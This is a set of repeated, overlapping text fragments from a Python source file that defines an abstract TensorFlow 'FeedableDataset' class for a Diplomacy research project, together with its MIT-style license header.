the queue where", "NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has been started \"\"\"", "the proto-fields and generation methods :param cluster_config: Optional. If set, the cluster configuration", "continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] =", "required protofields and casts/pads the item accordingly \"\"\" # Checking all features in", "to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\"", "the right dtype for feature in item: assert feature in self.proto_fields, 'Feature %s", "proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] =", "to the following conditions: # # The above copyright notice and this permission", "NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args,", "dataset (and its iterator) :param session: The TensorFlow session to use. :type session:", "Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the", ":param item: A dictionary with the fields required for that queue :param retry_on_failure:", "(RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset", "portions of the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible", "cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default", "restriction, including without limitation the # rights to use, copy, modify, merge, publish,", "data inside a model \"\"\" from abc import ABCMeta, abstractmethod import logging import", "this software and associated documentation files (the \"Software\"), # to deal in the", "def initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param session: The", "\"\"\" Determines if the dataset has been started \"\"\" return self._is_started @property def", "initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param session: The TensorFlow", "The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def", "item: A dictionary with the fields required for that queue :param retry_on_failure: Boolean", "(and its iterator) :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session", "and generation methods :param cluster_config: Optional. If set, the cluster configuration will be", "tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item", "\"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError()", "\"Software\"), # to deal in the Software without restriction, including without limitation the", "Software is # furnished to do so, subject to the following conditions: #", "cluster_config: Optional. If set, the cluster configuration will be used for distributed training.", "self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator", "self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) #", "a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder:", "cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features", "dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has", "is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\"", "dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config:", "initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is", "VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta):", "an iterator or if it is a remote (RPC) dataset \"\"\" raise NotImplementedError()", "\"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {}", "support an iterator or if it is a remote (RPC) dataset \"\"\" raise", "its iterator) :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\"", "to lists if isinstance(item[feature], set): item[feature] = list(item[feature]) # Var Len - Converting", "object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor", "the dataset (and its iterator) :param session: The TensorFlow session to use. :type", "Var Len - Converting and flattening # Scalar - Just converting # Fixed", "self.default_features = {} # Will be used as default if features are missing", "iterator or if it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property", "not in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to", "converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten()", "elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature],", "Boolean that indicates to retry querying from the model if an error is", "\"\"\" This object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None):", "in items, padding them and converting them to the right dtype for feature", "Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can support", "is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized @property def", "A dictionary with the fields required for that queue :param retry_on_failure: Boolean that", "dtype for feature in item: assert feature in self.proto_fields, 'Feature %s is not", "permission notice shall be included in all # copies or substantial portions of", "Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable", "software and associated documentation files (the \"Software\"), # to deal in the Software", "# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell", "of the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for", "diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object", "the item respects the required protofields and casts/pads the item accordingly \"\"\" #", "person obtaining # a copy of this software and associated documentation files (the", "proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return", "notice and this permission notice shall be included in all # copies or", "TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self,", "has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the", "padding them and converting them to the right dtype for feature in item:", "queue :param retry_on_failure: Boolean that indicates to retry querying from the model if", "isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod", "raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has been started", "to use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of", "= None self._is_started = False self._is_initialized = False self._is_closing = False def __del__(self):", "containing the proto-fields and generation methods :param cluster_config: Optional. If set, the cluster", "abc import ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import", "self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default if", "*args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self,", "TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args,", "False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self):", "If set, the cluster configuration will be used for distributed training. :type dataset_builder:", "@property def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return self._is_closing", "and to permit persons to whom the Software is # furnished to do", "This object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\"", "the following conditions: # # The above copyright notice and this permission notice", "SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\"", "they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook", "retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using item as inout", "# furnished to do so, subject to the following conditions: # # The", "import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from", "the Software, and to permit persons to whom the Software is # furnished", "to put the item :param item: A dictionary with the fields required for", "self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} #", "import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__)", "False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close()", "name of the queue where to put the item :param item: A dictionary", "responsible for feeding data inside a model \"\"\" from abc import ABCMeta, abstractmethod", "used as default if features are missing self.session = None self.iterator = None", "to do so, subject to the following conditions: # # The above copyright", "def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod", "item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def get_results(self,", "all # copies or substantial portions of the Software. # ============================================================================== \"\"\" Feedable", "\"\"\" # Checking all features in items, padding them and converting them to", "and flattening # Scalar - Just converting # Fixed Len - Padding and", "if the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines", "An instance of `BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional.", "hereby granted, free of charge, to any person obtaining # a copy of", "tornado.concurrent.Future that will be set with the results when they become available \"\"\"", "__del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset", "inside a model \"\"\" from abc import ABCMeta, abstractmethod import logging import numpy", "flattening # Scalar - Just converting # Fixed Len - Padding and converting", "whom the Software is # furnished to do so, subject to the following", "and converting them to the right dtype for feature in item: assert feature", "available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the", "make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def close(self): \"\"\"", "isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype)", "granted, free of charge, to any person obtaining # a copy of this", "\"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation", ":param queue_name: The name of the queue where to put the item :param", "closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise", "the item :param item: A dictionary with the fields required for that queue", "documentation files (the \"Software\"), # to deal in the Software without restriction, including", "results when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds", "dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields", "None self.iterator = None self._is_started = False self._is_initialized = False self._is_closing = False", "proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to lists if", "fields required for that queue :param retry_on_failure: Boolean that indicates to retry querying", "Optional. If set, the cluster configuration will be used for distributed training. :type", "used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder =", "The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self,", "{} # Will be used as default if features are missing self.session =", "dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the", "dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields", "is # furnished to do so, subject to the following conditions: # #", "and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature],", "Converting and flattening # Scalar - Just converting # Fixed Len - Padding", "# sell copies of the Software, and to permit persons to whom the", "def is_started(self): \"\"\" Determines if the dataset has been started \"\"\" return self._is_started", "abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField", "- Padding and converting if proto_field.dtype is None: continue elif isinstance(proto_field, VarProtoField): item[feature]", "outputs of a name using item as inout :param queue_name: The name of", "cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and", "return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod", "@property def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized", "\"\"\" from abc import ABCMeta, abstractmethod import logging import numpy as np from", "iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the", "distribute, sublicense, and/or # sell copies of the Software, and to permit persons", "\"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\"", "Makes sure the item respects the required protofields and casts/pads the item accordingly", "when they become available \"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a", "list(item[feature]) # Var Len - Converting and flattening # Scalar - Just converting", "set with the results when they become available \"\"\" raise NotImplementedError() @staticmethod def", "is encountered. :return: A tornado.concurrent.Future that will be set with the results when", "= False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines", "def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs)", "import ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder,", "Dataset - Abstract class responsible for feeding data inside a model \"\"\" from", "as default if features are missing self.session = None self.iterator = None self._is_started", "the required protofields and casts/pads the item accordingly \"\"\" # Checking all features", "item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field,", "using item as inout :param queue_name: The name of the queue where to", "querying from the model if an error is encountered. :return: A tornado.concurrent.Future that", "import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import", "a name using item as inout :param queue_name: The name of the queue", "def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of `BaseBuilder` containing", "tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and", "# Var Len - Converting and flattening # Scalar - Just converting #", "sublicense, and/or # sell copies of the Software, and to permit persons to", "FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\" def __init__(self, dataset_builder,", "the dataset has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines", "\"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if the dataset has been", "item as inout :param queue_name: The name of the queue where to put", "Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the", "\"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can support an", "\"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its", "ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField,", "\"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized @property def is_closing(self):", "with the fields required for that queue :param retry_on_failure: Boolean that indicates to", "@property def is_started(self): \"\"\" Determines if the dataset has been started \"\"\" return", "Software, and to permit persons to whom the Software is # furnished to", "import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is", "to the right dtype for feature in item: assert feature in self.proto_fields, 'Feature", "\"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if the dataset can", "is initialized \"\"\" return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset", "build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\"", "# copies or substantial portions of the Software. # ============================================================================== \"\"\" Feedable Dataset", "copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software,", "# NOTICE: Permission is hereby granted, free of charge, to any person obtaining", "methods :param cluster_config: Optional. If set, the cluster configuration will be used for", "in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets to lists", "diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config = cluster_config self.proto_fields =", "is None: continue elif isinstance(proto_field, VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape:", "without restriction, including without limitation the # rights to use, copy, modify, merge,", "item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of", "Starts the dataset :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session", "session): \"\"\" Initializes the dataset (and its iterator) :param session: The TensorFlow session", "use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes", "Determines if the dataset can support an iterator or if it is a", "can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator or if it", "the outputs of a name using item as inout :param queue_name: The name", "# Fixed Len - Padding and converting if proto_field.dtype is None: continue elif", "Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\"", "from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This", "the dataset can support an iterator or if it is a remote (RPC)", "furnished to do so, subject to the following conditions: # # The above", "and this permission notice shall be included in all # copies or substantial", "set): item[feature] = list(item[feature]) # Var Len - Converting and flattening # Scalar", "training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = dataset_builder self.cluster_config =", "= cluster_config self.proto_fields = BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as", "them to the right dtype for feature in item: assert feature in self.proto_fields,", "get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes the outputs of a name using", "the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset", "FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item @abstractmethod def", "@abstractmethod def start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow session", "self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects the required", "error is encountered. :return: A tornado.concurrent.Future that will be set with the results", "item: assert feature in self.proto_fields, 'Feature %s is not in proto fields.' %", "`BaseBuilder` containing the proto-fields and generation methods :param cluster_config: Optional. If set, the", "Abstract class responsible for feeding data inside a model \"\"\" from abc import", "elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature],", "def can_support_iterator(self): \"\"\" Determines if the dataset can support an iterator or if", "is not in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting sets", "the dataset :param session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\"", "BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER = logging.getLogger(__name__) class", "feature in item: assert feature in self.proto_fields, 'Feature %s is not in proto", "items, padding them and converting them to the right dtype for feature in", "the cluster configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type", "# Checking all features in items, padding them and converting them to the", "not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape),", "for feature in item: assert feature in self.proto_fields, 'Feature %s is not in", ":param dataset_builder: An instance of `BaseBuilder` containing the proto-fields and generation methods :param", "self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return", "modify, merge, publish, distribute, sublicense, and/or # sell copies of the Software, and", "from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants LOGGER", "\"\"\" Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self):", "\"\"\" Feedable Dataset - Abstract class responsible for feeding data inside a model", "Returning item return item @abstractmethod def get_results(self, queue_name, item, retry_on_failure=True, **kwargs): \"\"\" Computes", "that queue :param retry_on_failure: Boolean that indicates to retry querying from the model", "NotImplementedError() @abstractmethod def start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow", "raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object", "copies of the Software, and to permit persons to whom the Software is", "will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\"", "in item: assert feature in self.proto_fields, 'Feature %s is not in proto fields.'", "will be set with the results when they become available \"\"\" raise NotImplementedError()", "for feeding data inside a model \"\"\" from abc import ABCMeta, abstractmethod import", "\"\"\" Initializes the dataset (and its iterator) :param session: The TensorFlow session to", "return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\"", "notice shall be included in all # copies or substantial portions of the", "get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def", "@staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession object \"\"\" def", "in all # copies or substantial portions of the Software. # ============================================================================== \"\"\"", "if an error is encountered. :return: A tornado.concurrent.Future that will be set with", "a model \"\"\" from abc import ABCMeta, abstractmethod import logging import numpy as", "proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype)", "a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self): \"\"\" Determines if", "self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property", "shall be included in all # copies or substantial portions of the Software.", "accordingly \"\"\" # Checking all features in items, padding them and converting them", "item respects the required protofields and casts/pads the item accordingly \"\"\" # Checking", "retry querying from the model if an error is encountered. :return: A tornado.concurrent.Future", "= {} # Will be used as default if features are missing self.session", "them and converting them to the right dtype for feature in item: assert", "The above copyright notice and this permission notice shall be included in all", "self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def", "session: The TensorFlow session to use. :type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod", "generic feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An", "charge, to any person obtaining # a copy of this software and associated", "return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects the", "self.session = None self.iterator = None self._is_started = False self._is_initialized = False self._is_closing", "pad_list # Constants LOGGER = logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a", "return self._is_initialized @property def is_closing(self): \"\"\" Determines if the dataset is closing \"\"\"", "the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract class responsible for feeding", "proto-fields and generation methods :param cluster_config: Optional. If set, the cluster configuration will", "feature proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature]", "%s is not in proto fields.' % feature proto_field = self.proto_fields[feature] # Converting", "an error is encountered. :return: A tornado.concurrent.Future that will be set with the", "a copy of this software and associated documentation files (the \"Software\"), # to", "raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return", "'Feature %s is not in proto fields.' % feature proto_field = self.proto_fields[feature] #", "numpy as np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list", "item accordingly \"\"\" # Checking all features in items, padding them and converting", "\"\"\" Starts the dataset :param session: The TensorFlow session to use. :type session:", "is_started(self): \"\"\" Determines if the dataset has been started \"\"\" return self._is_started @property", "feedable dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance", "default if features are missing self.session = None self.iterator = None self._is_started =", "can support an iterator or if it is a remote (RPC) dataset \"\"\"", "Just converting # Fixed Len - Padding and converting if proto_field.dtype is None:", "= np.array(item[feature], proto_field.dtype) elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning", "logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\" def", "sell copies of the Software, and to permit persons to whom the Software", "Copyright 2019 - <NAME> # # NOTICE: Permission is hereby granted, free of", "# # The above copyright notice and this permission notice shall be included", "BaseBuilder.parse_sparse_fields(dataset_builder.proto_fields) self.default_features = {} # Will be used as default if features are", "copies or substantial portions of the Software. # ============================================================================== \"\"\" Feedable Dataset -", "if it is a remote (RPC) dataset \"\"\" raise NotImplementedError() @property def is_started(self):", "None self._is_started = False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\"", "= logging.getLogger(__name__) class FeedableDataset(metaclass=ABCMeta): \"\"\" This object is a generic feedable dataset \"\"\"", "use, copy, modify, merge, publish, distribute, sublicense, and/or # sell copies of the", "NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the dataset (and its iterator) :param", "**kwargs): \"\"\" Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item):", "\"\"\" raise NotImplementedError() @staticmethod def make_session_run_hook(): \"\"\" Builds a SessionRunHook for the MonitoredTrainingSession", "be used as default if features are missing self.session = None self.iterator =", "cluster configuration will be used for distributed training. :type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config:", "prepare_item(self, item): \"\"\" Makes sure the item respects the required protofields and casts/pads", "VarProtoField): item[feature] = np.array(item[feature], proto_field.dtype).flatten() elif not proto_field.shape: item[feature] = np.array(item[feature], proto_field.dtype) elif", "of charge, to any person obtaining # a copy of this software and", "def start(self, session): \"\"\" Starts the dataset :param session: The TensorFlow session to", "dataset \"\"\" def __init__(self, dataset_builder, cluster_config=None): \"\"\" Constructor :param dataset_builder: An instance of", "is_closing(self): \"\"\" Determines if the dataset is closing \"\"\" return self._is_closing @abstractmethod def", ":type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() def get_feedable_item(self, *args, **kwargs): \"\"\" Calls the", "dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds the dataset", "self._is_started = False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor", "if the dataset is closing \"\"\" return self._is_closing @abstractmethod def build(self): \"\"\" Builds", "including without limitation the # rights to use, copy, modify, merge, publish, distribute,", "from abc import ABCMeta, abstractmethod import logging import numpy as np from diplomacy_research.models.datasets.base_builder", "- Converting and flattening # Scalar - Just converting # Fixed Len -", "elif isinstance(proto_field, FixedProtoField): item[feature] = np.array(pad_list(item[feature], proto_field.shape), proto_field.dtype) # Returning item return item", "the model if an error is encountered. :return: A tornado.concurrent.Future that will be", "casts/pads the item accordingly \"\"\" # Checking all features in items, padding them", "if features are missing self.session = None self.iterator = None self._is_started = False", "to retry querying from the model if an error is encountered. :return: A", "if the dataset has been started \"\"\" return self._is_started @property def is_initialized(self): \"\"\"", "Calls the dataset_builder get_feedable_item \"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes", "be set with the results when they become available \"\"\" raise NotImplementedError() @staticmethod", "if the dataset can support an iterator or if it is a remote", "\"\"\" return self._is_started @property def is_initialized(self): \"\"\" Determines if the iterator is initialized", "to whom the Software is # furnished to do so, subject to the", "False def __del__(self): \"\"\" Destructor \"\"\" self.close() @property def can_support_iterator(self): \"\"\" Determines if", "deal in the Software without restriction, including without limitation the # rights to", "A tornado.concurrent.Future that will be set with the results when they become available", "be included in all # copies or substantial portions of the Software. #", "np from diplomacy_research.models.datasets.base_builder import BaseBuilder, VarProtoField, FixedProtoField from diplomacy_research.utils.model import pad_list # Constants", "or substantial portions of the Software. # ============================================================================== \"\"\" Feedable Dataset - Abstract", "= False self._is_initialized = False self._is_closing = False def __del__(self): \"\"\" Destructor \"\"\"", "of this software and associated documentation files (the \"Software\"), # to deal in", ":type session: tensorflow.python.client.session.Session \"\"\" raise NotImplementedError() @abstractmethod def initialize(self, session): \"\"\" Initializes the", "of the queue where to put the item :param item: A dictionary with", "Scalar - Just converting # Fixed Len - Padding and converting if proto_field.dtype", "def is_initialized(self): \"\"\" Determines if the iterator is initialized \"\"\" return self._is_initialized @property", "the queue where to put the item :param item: A dictionary with the", "def build(self): \"\"\" Builds the dataset \"\"\" raise NotImplementedError() @abstractmethod def start(self, session):", "proto_field = self.proto_fields[feature] # Converting sets to lists if isinstance(item[feature], set): item[feature] =", "converting them to the right dtype for feature in item: assert feature in", "the MonitoredTrainingSession object \"\"\" def close(self): \"\"\" Stops the dataset \"\"\" self._is_closing =", "retry_on_failure: Boolean that indicates to retry querying from the model if an error", "do so, subject to the following conditions: # # The above copyright notice", "\"\"\" return self.dataset_builder.get_feedable_item(*args, **kwargs) def prepare_item(self, item): \"\"\" Makes sure the item respects", ":type dataset_builder: diplomacy_research.models.datasets.base_builder.BaseBuilder :type cluster_config: diplomacy_research.utils.cluster.ClusterConfig \"\"\" self.dataset_builder = 